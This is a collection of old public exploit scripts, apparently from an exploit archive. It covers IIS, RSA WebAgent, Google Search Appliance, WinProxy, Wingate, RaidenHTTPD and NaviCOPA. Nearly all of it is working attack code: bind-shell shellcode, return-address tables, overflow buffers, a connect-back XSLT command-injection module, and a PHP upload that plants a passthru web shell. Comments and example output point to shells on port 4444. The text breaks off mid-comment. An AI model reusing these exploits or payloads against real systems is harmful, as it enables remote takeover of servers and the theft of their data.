"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x 07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x 24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x 6c\x24\x1c\x61".
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x 1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x 66\x68\x33\x32".
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x 3b\x50\xff\xd6".
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\x d0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x 43\x53\xff\xd0".
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x 70\xc7\x57\xff".
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x 57\xff\xd6\x53".
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x 54\x54\x55\xff".
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\x d0\x66\x6a\x64".
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\x e7\x6a\x44\x89".
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x 8d\x7a\x38\xab".
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x 5b\x57\x52\x51".
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\x d9\x05\xce\x53".
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\x c4\x64\xff\xd6".
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\x d0";
$all = $x90.$shellcode;
$get = "GET /$x90.$shellcode.$sp4 \r\n\n";
$shell = $pack_ret.$sploit.$x90;
print "[+] Sending overflOw..\n";
send(SOCK, $get, 0) or die "[-] Failed query: $!";
sleep(1);
print "[+] Server Overflow!\n";
print "[+] Send SplOit..\n";
send(SOCK, $shell, 0) or die "[-] Failed query: $!";
sleep(1);
print "[+] Granted!\n";
close(SOCK);
print "[~] Trying connect $remote port 4444\n";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => "4444", Photo => tcp)
|| die "[-] FAILED ...\n";
close($socket);
print "[+] PWNED rulz port 4444 ...\n";
exit;
// [2005-08-30]
80 MS Windows IIS SA WebAgent 5.2/5.3 Redirect Overflow Exploit (meta)
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::rsa_iiswebagent_redirect;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'IIS RSA WebAgent Redirect Overflow',
'Version' => '$Revision: 1.4 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'SSL' => [0, 'BOOL', 'Use SSL'],
'URL' => [1, 'DATA', 'The path to the DLL', '/WebID/IISWebAgentIF.dll'],
},
'Payload' =>
{
'Space' => 1024,
'BadChars' =>
"\x00\x09\x0a\x0b\x0d\x20\x22\x23\x25\x26\x27\x2b\x 2f".
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x5c". "Z",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the SecurID Web Agent for IIS.
This ISAPI filter runs in-process with inetinfo.exe, any attempt to
exploit this flaw will result in the termination and potential restart
of the IIS service.
}),
'Refs' =>
[
# Anyone got a patch/advisory/solution URL?
],
'Targets' =>
[
# Version-specific return addresses
['RSA WebAgent 5.2', 996, 0x1001e694],
['RSA WebAgent 5.3', 992, 0x10010e89],
# Generic return addresses
['RSA WebAgent 5.2 on Windows 2000 English', 996, 0x75022ac4],
['RSA WebAgent 5.3 on Windows 2000 English', 992, 0x75022ac4],
['RSA WebAgent 5.2 on Windows XP SP0-SP1 English', 996, 0x71ab1d54],
['RSA WebAgent 5.3 on Windows XP SP0-SP1 English', 992, 0x71ab1d54],
['RSA WebAgent 5.2 on Windows XP SP2 English', 996, 0x71ab9372],
['RSA WebAgent 5.3 on Windows XP SP2 English', 992, 0x71ab9372],
['RSA WebAgent 5.2 on Windows 2003 English SP0', 996, 0x7ffc0638],
['RSA WebAgent 5.3 on Windows 2003 English SP0', 992, 0x7ffc0638],
],
'Keys' => ['rsa'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("GET ".$self->GetVar('URL')."?GetPic?image=msf HTTP/1.1\r\nHost: $target_host:$target_port\r\n\r\n");
my $r = $s->Recv(-1, 5);
if ($r =~ /RSA Web Access Authentication/)
{
$self->PrintLine(" Found IISWebAgentIF.dll ;)");
return $self->CheckCode('Detected');
} else {
$self->PrintLine("The IISWebAgentIF.dll ISAPI does not appear to be installed");
return $self->CheckCode('Safe');
}
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[ $target_idx ];
$self->PrintLine(" Attempting to exploit target ".$target->[0]);
my $pattern = Pex::Text::AlphaNumText(8192);
# Just don't ask.
$pattern =~ s/\d|Z/A/ig;
substr($pattern, $target->[1] , 4, pack('V', $target->[2]));
substr($pattern, $target->[1] - 4, 2, "\xeb\x06");
substr($pattern, $target->[1] + 4, length($shellcode), $shellcode);
my $request =
"GET ".$self->GetVar('URL')."?Redirect?url=$pattern HTTP/1.1\r\n".
"Host: $target_host:$target_port\r\n\r\n";
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine(" Sending " .length($request) . " bytes to remote host.");
$s->Send($request);
$self->PrintLine(" Waiting for a response...");
$s->Recv(-1, 10);
$self->Handler($s);
$s->Close();
return;
}
# [2005-10-19]
80 Google Search Appliance proxystylesheet XSLT Java Code Execution
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::google_proxystylesheet_exec;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket;
use IO::Select;
my $advanced = { };
my $info =
{
'Name' => 'Google Appliance ProxyStyleSheet Command Execution',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits a feature in the Saxon XSLT parser used by
the Google Search Appliance. This feature allows for arbitrary
java methods to be called. Google released a patch and advisory to
their client base in August of 2005 (GA-2005-08-m). The target appliance
must be able to connect back to your machine for this exploit to work.
}),
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [ 1, 'HOST', 'The address of the Google appliance'],
'RPORT' => [ 1, 'PORT', 'The port used by the search interface', 80],
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'],
},
'Payload' =>
{
'Space' => 1024,
'Keys' => [ 'cmd' ],
},
'Refs' =>
[
['OSVDB', 20981],
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'Google Search Appliance']
],
'Keys' => [ 'google' ],
'DisclosureDate' => 'Aug 16 2005',
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
sub Check {
my $self = shift;
my $s = $self->ConnectSearch;
if (! $s) {
return $self->CheckCode('Connect');
}
my $url =
"/search?client=". Pex::Text::AlphaNumText(int(rand(15))+1). "&".
"site=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
"output=xml_no_dtd&".
"q=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
"proxystylesheet=http://".Pex::Text::AlphaNumText(int(rand(32))+1)."/";
$s->Send("GET $url HTTP/1.0\r\n\r\n");
my $page = $s->Recv(-1, 5);
$s->Close;
if ($page =~ /cannot be resolved to an ip address/) {
$self->PrintLine(" This system appears to be vulnerable >:-)");
return $self->CheckCode('Confirmed');
}
if ($page =~ /ERROR: Unable to fetch the stylesheet/) {
$self->PrintLine(" This system appears to be patched");
}
$self->PrintLine(" This system does not appear to be vulnerable");
return $self->CheckCode('Safe');
}
sub Exploit
{
my $self = shift;
my ($s, $page);
# Request the index page to obtain a redirect response
$s = $self->ConnectSearch || return;
$s->Send("GET / HTTP/1.0\r\n\r\n");
$page = $s->Recv(-1, 5);
$s->Close;
# Parse the redirect to get the client and site values
my ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\&]+)\&.*client=([^\&]+)\&/im;
if (! $goog_site || ! $goog_clnt) {
$self->PrintLine(" Invalid response to our request, is this a Google appliance?");
#$self->PrintLine($page);
#!!! return;
$goog_site = 'test';
$goog_clnt = 'test';
}
# Create the listening local socket that will act as our HTTP server
my $lis = IO::Socket::INET->new(
LocalHost => $self->GetVar('HTTPHOST'),
LocalPort => $self->GetVar('HTTPPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp');
if (not defined($lis)) {
$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
return;
}
my $sel = IO::Select->new($lis);
# Send a search request with our own address in the proxystylesheet parameter
my $query = Pex::Text::AlphaNumText(int(rand(32))+1);
my $proxy =
"http://".
($self->GetVar('HTTPADDR') || Pex::Utils::SourceIP($self->GetVar('RHOST'))).
":".$self->GetVar('HTTPPORT')."/".Pex::Text::AlphaNumText(int(rand(15))+1).".xsl";
my $url =
"/search?client=". $goog_clnt ."&site=". $goog_site .
"&output=xml_no_dtd&proxystylesheet=". $proxy .
"&q=". $query ."&proxyreload=1";
$self->PrintLine(" Sending our malicious search request...");
$s = $self->ConnectSearch || return;
$s->Send("GET $url HTTP/1.0\r\n\r\n");
$page = $s->Recv(-1, 3);
$s->Close;
$self->PrintLine(" Listening for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ...");
# Did we receive a connection?
my @r = $sel->can_read(30);
if (! @r) {
$self->PrintLine(" No connection received from the search engine, possibly patched.");
$lis->close;
return;
}
my $c = $lis->accept();
if (! $c) {
$self->PrintLine(" No connection received from the search engine, possibly patched.");
$lis->close;
return;
}
my $cli = Msf::Socket::Tcp->new_from_socket($c);
$self->PrintLine(" Connection received from ".$cli->PeerAddr."...");
$self->ProcessHTTP($cli);
return;
}
sub ConnectSearch {
my $self = shift;
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $self->GetVar('RHOST'),
'PeerPort' => $self->GetVar('RPORT'),
'SSL' => $self->GetVar('SSL')
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
return $s;
}
sub ProcessHTTP
{
my $self = shift;
my $cli = shift;
my $targetIdx = $self->GetVar('TARGET');
my $target = $self->Targets->[$targetIdx];
my $ret = $target->[1];
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $content;
my $rhost;
my $rport;
# Read the first line of the HTTP request
my ($cmd, $url, $proto) = split(/ /, $cli->RecvLine(10));
# The way we call Runtime.getRuntime().exec, Java will split
# our string on whitespace. Since we are injecting via XSLT,
# inserting quotes becomes a huge pain, so we do this...
my $exec_str =
'/usr/bin/perl -e system(pack(qq{H*},qq{' .
unpack("H*", $self->GetVar('EncodedPayload')->RawPayload).
'}))';
# Load the template from our data section, we have to manually
# seek and reposition to allow the exploit to be used more
# than once without a reload.
seek(DATA, 0, 0);
while(<DATA>) { last if /^__DATA__$/ }
while(<DATA>) { $content .= $_ }
# Insert our command line
$content =~ s/:x:MSF:x:/$exec_str/;
# Send it to the requesting appliance
$rport = $cli->PeerPort;
$rhost = $cli->PeerAddr;
$self->PrintLine(" HTTP Client connected from $rhost, sending XSLT...");
my $res = "HTTP/1.1 200 OK\r\n" .
"Content-Type: text/html\r\n" .
"Content-Length: " . length($content) . "\r\n" .
"Connection: close\r\n" .
"\r\n" .
$content;
$self->PrintLine(" Sending ".length($res)." bytes...");
$cli->Send($res);
$cli->Close;
}
1;
# [2005-11-20]
80 BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit
#!perl
#
# "WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit
#
# Author: Fist****er (aka FistFuXXer)
# e-Mail: [email protected]
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
#
# CVE info:
# CAN-2005-4085
#
use IO::Socket;
#
# destination IP address
#
$ip = '127.0.0.1';
#
# destination TCP port
#
$port = 80;
#
# SE handler. 0x00, 0x0a, 0x0d free
#
$seh = reverse( "\x01\x03\x12\x40" ); # POP/POP/RET
# PAVDLL.01031240
#
# JMP SHORT to shellcode. 0x00, 0x0a, 0x0d free
#
$jmp = "\x90\x90\xeb\x32"; # [NOP][NOP][JMP|JMP]
#
# 0x00, 0x0a, 0x0d free shellcode
#
# win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
#
$sc = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x26".
"\x8c\x6d\xa3\x83\xeb\xfc\xe2\xf4\xda\xe6\x86\xee\x ce\x75\x92\x5c".
"\xd9\xec\xe6\xcf\x02\xa8\xe6\xe6\x1a\x07\x11\xa6\x 5e\x8d\x82\x28".
"\x69\x94\xe6\xfc\x06\x8d\x86\xea\xad\xb8\xe6\xa2\x c8\xbd\xad\x3a".
"\x8a\x08\xad\xd7\x21\x4d\xa7\xae\x27\x4e\x86\x57\x 1d\xd8\x49\x8b".
"\x53\x69\xe6\xfc\x02\x8d\x86\xc5\xad\x80\x26\x28\x 79\x90\x6c\x48".
"\x25\xa0\xe6\x2a\x4a\xa8\x71\xc2\xe5\xbd\xb6\xc7\x ad\xcf\x5d\x28".
"\x66\x80\xe6\xd3\x3a\x21\xe6\xe3\x2e\xd2\x05\x2d\x 68\x82\x81\xf3".
"\xd9\x5a\x0b\xf0\x40\xe4\x5e\x91\x4e\xfb\x1e\x91\x 79\xd8\x92\x73".
"\x4e\x47\x80\x5f\x1d\xdc\x92\x75\x79\x05\x88\xc5\x a7\x61\x65\xa1".
"\x73\xe6\x6f\x5c\xf6\xe4\xb4\xaa\xd3\x21\x3a\x5c\x f0\xdf\x3e\xf0".
"\x75\xdf\x2e\xf0\x65\xdf\x92\x73\x40\xe4\x7c\xff\x 40\xdf\xe4\x42".
"\xb3\xe4\xc9\xb9\x56\x4b\x3a\x5c\xf0\xe6\x7d\xf2\x 73\x73\xbd\xcb".
"\x82\x21\x43\x4a\x71\x73\xbb\xf0\x73\x73\xbd\xcb\x c3\xc5\xeb\xea".
"\x71\x73\xbb\xf3\x72\xd8\x38\x5c\xf6\x1f\x05\x44\x 5f\x4a\x14\xf4".
"\xd9\x5a\x38\x5c\xf6\xea\x07\xc7\x40\xe4\x0e\xce\x af\x69\x07\xf3".
"\x7f\xa5\xa1\x2a\xc1\xe6\x29\x2a\xc4\xbd\xad\x50\x 8c\x72\x2f\x8e".
"\xd8\xce\x41\x30\xab\xf6\x55\x08\x8d\x27\x05\xd1\x d8\x3f\x7b\x5c".
"\x53\xc8\x92\x75\x7d\xdb\x3f\xf2\x77\xdd\x07\xa2\x 77\xdd\x38\xf2".
"\xd9\x5c\x05\x0e\xff\x89\xa3\xf0\xd9\x5a\x07\x5c\x d9\xbb\x92\x73".
"\xad\xdb\x91\x20\xe2\xe8\x92\x75\x74\x73\xbd\xcb\x 58\x54\x8f\xd0".
"\x75\x73\xbb\x5c\xf6\x8c\x6d\xa3";
print '"WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit'."\n\n";
$sock = IO::Socket::INET->new
(
PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp',
Timeout => 2
) or print '[-] Error: Could not establish a connection to the server!' and exit(1);
print "[+] Connected.\n";
print "[+] Trying to overwrite SE handler...\n";
$sock->send( "GET / HTTP/1.0\r\n" );
$sock->send( 'Host: 127.0.0.1:'. "\x90" x 23 . $jmp . $seh . "\x90" x 50 . $sc ."\r\n\r\n" );
print "[+] Done. Now check for bind shell on $ip:4444!";
close($sock);
# [2006-01-07]
80 QBik Wingate 6.1.1.1077 (POST) Remote Buffer Overflow Exploit
### *** Proof of concept (not for "in the wild" kiddies) ***
### QBik Wingate version 6.1.1.1077 remote exploit for Win2k SP4 (german)
### by kcope in 2006
###
use IO::Socket;
if ($ARGV[0] eq "")
{
print "param1 = remote host";
exit;
}
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x36\x4b\x4e".
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x56\x4b\x58".
"\x4e\x46\x46\x32\x46\x52\x4b\x48\x45\x44\x4e\x33\x 4b\x38\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x 4a\x31\x4b\x58".
"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x58\x 46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x 46\x58\x42\x4c".
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x 44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x52\x4a\x32\x45\x57\x 45\x4e\x4b\x58".
"\x4f\x35\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x 4e\x50\x4b\x34".
"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x30\x 4e\x52\x4b\x58".
"\x49\x48\x4e\x46\x46\x32\x4e\x31\x41\x36\x43\x4c\x 41\x43\x4b\x4d".
"\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x58\x42\x34\x 4e\x30\x4b\x48".
"\x42\x47\x4e\x31\x4d\x4a\x4b\x58\x42\x54\x4a\x30\x 50\x35\x4a\x46".
"\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x 48\x4d\x48\x46".
"\x43\x35\x48\x56\x4a\x46\x43\x53\x44\x53\x4a\x46\x 47\x47\x43\x47".
"\x44\x33\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x 4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x 49\x38\x45\x4e".
"\x48\x36\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x55\x 4c\x46\x44\x30".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x 4d\x4a\x47\x45".
"\x4f\x4f\x48\x4d\x43\x55\x43\x35\x43\x35\x43\x55\x 43\x35\x43\x44".
"\x43\x35\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x 4a\x46\x41\x31".
"\x4e\x45\x48\x56\x43\x55\x49\x48\x41\x4e\x45\x59\x 4a\x46\x46\x4a".
"\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x 4c\x56\x42\x51".
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x 4d\x4a\x50\x52".
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x45\x 4f\x4f\x42\x4d".
"\x4a\x36\x45\x4e\x49\x54\x48\x48\x49\x54\x47\x35\x 4f\x4f\x48\x4d".
"\x42\x35\x46\x35\x46\x55\x45\x55\x4f\x4f\x42\x4d\x 43\x59\x4a\x46".
"\x47\x4e\x49\x57\x48\x4c\x49\x57\x47\x35\x4f\x4f\x 48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x 4a\x56\x43\x46".
"\x4d\x46\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x 49\x52\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x46\x46\x34\x49\x38\x44\x4e\x 41\x43\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x42\x50\x4f\x 44\x54\x4e\x32".
"\x43\x39\x4d\x58\x4c\x47\x4a\x53\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x46".
"\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x 46\x54\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x55\x41\x35\x 41\x35\x4c\x56".
"\x41\x30\x41\x55\x41\x55\x45\x55\x41\x55\x4f\x4f\x 42\x4d\x4a\x56".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x 48\x4d\x4c\x36".
"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x 47\x45\x4e\x4f".
"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x35\x 4f\x4f\x42\x4d".
"\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x35\x43\x35\x 4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '80',
Proto => 'tcp');
$ret = "\x4b\x4f\x9e\x01"; # JMP ESI Win2k SP4 German
$x = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKK LLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSAAAAUUUUVVVVWWWWXX XXYYYYZZZZ"
."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKK LLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSBBBBUUUUVVVVWWWWXX XXYYYYZZZZ"
."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKK LLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS".$ret."UUUUVVVVWWWWXXXXYYYYZZZZ"
."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKK LLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSDDDDUUUUVVVVWWWWXX XXYYYYZZZZ"
."AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJ\xeb\x3dKKKK LLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSEEEEUUUUVVVVWWWWXX XXYYYYZZZZ";
$a = "A" x 2000 . $x . "\x90" x 100 . $shellcode;
print $sock "POST http://$a/ HTTP/1.0\r\n\r\n";
while (<$sock>) {
print;
}
# [2006-06-07]
80 RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution Exploit
#!/usr/bin/php -q -d short_open_tag=on
<?
print_r('
-----------------------------------------------------------------------------
RaidenHTTPD/1.1.49 remote commands execution exploit
by rgod [email protected]
site: http://retrogod.altervista.org
dork: Powered.by.RaidenHTTPD +intitle:index.of | inurl:raidenhttpd-admin
-johnny -GHDB
-----------------------------------------------------------------------------
');
if ($argc<3) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host cmd OPTIONS
host: target server (ip/hostname)
cmd: a shell command
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' 2.2.2.2 ver -P1.1.1.1:80
php '.$argv[0].' 1.1.1.1 dir /q -p81
-----------------------------------------------------------------------------
');
die;
}
/*
software site: http://www.raidenhttpd.com/en/
description: "RaidenHTTPD is a fully featured web server software for Windows 98 / Me / 2000 / XP / 2003 platforms."
explanaition: this software carries a PHP interpreter (4.4.1 version...)
and you have an administrative interface in /raidenhttpd-admin folder
but... you can have anauthorized access to some scripts in
/raidenhttpd-admin/slice folder, in check.php at line 35 u have:
...
include_once($SoftParserFileXml); // This is the parser class.
...
$SoftParserFileXml var is not initizialized so u can include
an arbitrary uploaded temporary file or arbitrary http location
also register_globals and allow_url_fopen are enabled by default (harakiri?)
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) ';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$cmd="";
$port=80;
$proxy="";
for ($i=2; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p="/";} else {$p='http://'.$host.':'.$port."/";}
$data ="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"SoftParserFileXml\"; filename=\"suntzu\";\r\n";
$data.="Content-Type: image/jpeg;\r\n\r\n";
$data.="<?php set_time_limit(0); echo 'my_delim';passthru(\$_SERVER['HTTP_SUNTZU']);die;?>\r\n";
$data.="-----------------------------7d529a1d23092a--\r\n";
$packet ="POST ".$p."raidenhttpd-admin/slice/check.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="SUNTZU: $cmd\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"my_delim")){
echo "exploit succeeded...\n";$temp=explode("my_delim",$html);die($temp[1]);
}
echo "exploit failed...";
?>
# [2006-09-08]
80 NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit
/*
navi_exp.c
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07 <[email protected]>
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:
C:\>navi_exp 192.168.0.1 0
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07 <[email protected]>
[+] Sending buffer: OK
Check your shell on 192.168.0.1:4444
Press enter to quit
C:\>nc -v 192.168.0.1 4444
[192.168.0.1] 4444 (?) open
Microsoft Windows XP [Wersja 5.1.2600]
